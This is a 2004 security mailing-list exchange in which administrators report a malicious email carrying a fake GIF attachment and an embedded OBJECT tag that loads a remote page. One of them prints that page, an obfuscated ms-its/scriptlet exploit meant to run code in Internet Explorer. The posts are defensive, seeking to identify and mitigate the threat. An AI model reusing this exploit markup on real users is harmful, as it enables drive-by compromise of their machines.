I'm glad someone else saw this. I have had two instances of this today
and noticed that the ".gif" file contained 45451212. I had one e-mail
with the subject of "1" and one with the subject of "2". Both contained
the attachment "1.gif." I also received the active x notification and
did not pursue it further to realize there was a hidden url embedded in
the message. After receiving your alert I looked deeper and found the
same url listed.
Something's going around.
Thanks,
Mike
Michael Fredericks
Network Administrator
Nautic Partners, LLC
-----Original Message-----
From: Mason, Samuel [mailto:smason@state.mt.us]
Sent: Friday, August 27, 2004 2:05 PM
To: focus-virus@securityfocus.com
Subject: Virus from vikord.com?
Hello all,
I'd like to see who else has run into this problem.
We had a user receive a mail from what was supposed to me another State
employee. The email had a GIF attachment (2.gif) With the subject line
of
"2".
The GIF file was invalid and only contained the characters "45451212"
The HTML in the message included this:
<OBJECT data=http://www.v%69k%6F%72d.com/default.htm>
which resolved to www.vikord.com.default.htm. The site is down with a
"Service Temporarily Unavailable" message due to maintenance or capacity
problems.
I Googled for an answer and got a little info that included this:
Quick snag with wget:
wget http://www.v%69k%6F%72d.com/default.htm
--14:26:50-- http://www.vikord.com/default.htm
=> `default.htm'
Resolving www.vikord.com... 194.226.217.167
Connecting to www.vikord.com[194.226.217.167]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 350
--.--K/s
14:26:56 (3.34 MB/s) - `default.htm' saved [350]
username@coroner ~ $ cat default.htm
<textarea id="code" style="display:none;">
<object
data="ms-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.c
hm::
/defa
ult.htm"
type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,
loca
tion.href.inde
xOf('default.htm'))));
</script>
Which seems to indicate the original intent was to download a CHM file,
correct?
I'd like to know if someone else has seen this. Is this a known virus or
something that I just could not find info for? The website is down,
which is
good, but how can we mitigate this on a more permanent basis? Our
workstations indicated that the AtiveX control could not run and the
page
would not display properly but I am concerned that users may have lower
security settings somewhere in the enterprise.
Thanks for any help.
Samuel Mason, CISSP
OCP, Information Technology Services Division
State of Montana
---------------------------------------CONFIDENTIALITY
NOTICE--------------------------------------------
This message is intended only for the individual or entity to which it is
addressed and may contain information that is privileged, confidential and
exempt from disclosure under applicable law. If you are not the intended
recipient, or the employee or agent responsible for delivering the message to
the intended recipient, you are hereby notified that any dissemination,
distribution or copying of this communication is strictly prohibited, and you
are requested to please notify us immediately by telephone, and return the
original message to us at the above address.
Nautic Partners, LLC
